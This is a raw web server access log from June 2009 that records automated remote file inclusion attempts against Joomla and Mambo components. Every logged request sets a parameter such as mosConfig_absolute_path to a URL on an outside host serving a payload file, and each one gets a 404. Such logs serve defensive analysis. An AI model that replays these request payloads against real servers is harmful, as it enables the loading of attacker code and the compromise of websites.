203.151.233.106 - - [04/Jun/2009:02:17:06 -0400] "GET /logs/access_log.Q109053100%20%20//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:02:17:06 -0400] "GET /logs/access_log.Q109051600%20%20//components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 300 "-" "Mozilla/5.0"
203.151.233.106 - - [04/Jun/2009:02:17:07 -0400] "GET //components/com_artforms/assets/captcha/includes/captchatalk/swfmovie.php?mosConfig_absolute_path=http://www.angelcitytrading.com/css/1.txt?? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
85.17.162.28 - - [04/Jun/2009:02:17:09 -0400] "GET /logs/access_log.Q109052100%20%20/?sourcedir=http://www.mascava.be/cava/images/SJ?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:17:37 -0400] "GET /admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:17:37 -0400] "GET /logs/access_log.Q108121900/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:17:37 -0400] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
220.79.47.122 - - [04/Jun/2009:02:17:38 -0400] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
220.79.47.122 - - [04/Jun/2009:02:17:38 -0400] "GET /logs/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
220.79.47.122 - - [04/Jun/2009:02:17:38 -0400] "GET /logs/access_log.Q109053100/components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://www.promodelia.com/gefel.txt? HTTP/1.1" 404 266 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0"
89.223.3.98 - - [04/Jun/2009:02:17:43 -0400] "GET /logs/access_log.Q109051000//components/com_flyspray/startdown.php?file=http://www.aet-senegal.com//administrator/components/com_dbquery/classes/DBQ/admin/id1.txt? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:17:46 -0400] "GET /admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
218.185.20.88 - - [04/Jun/2009:02:17:46 -0400] "GET /logs/admin.admin.html.php?mosConfig_absolute_path=http://www.kq-china.com/web//plugins/system/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
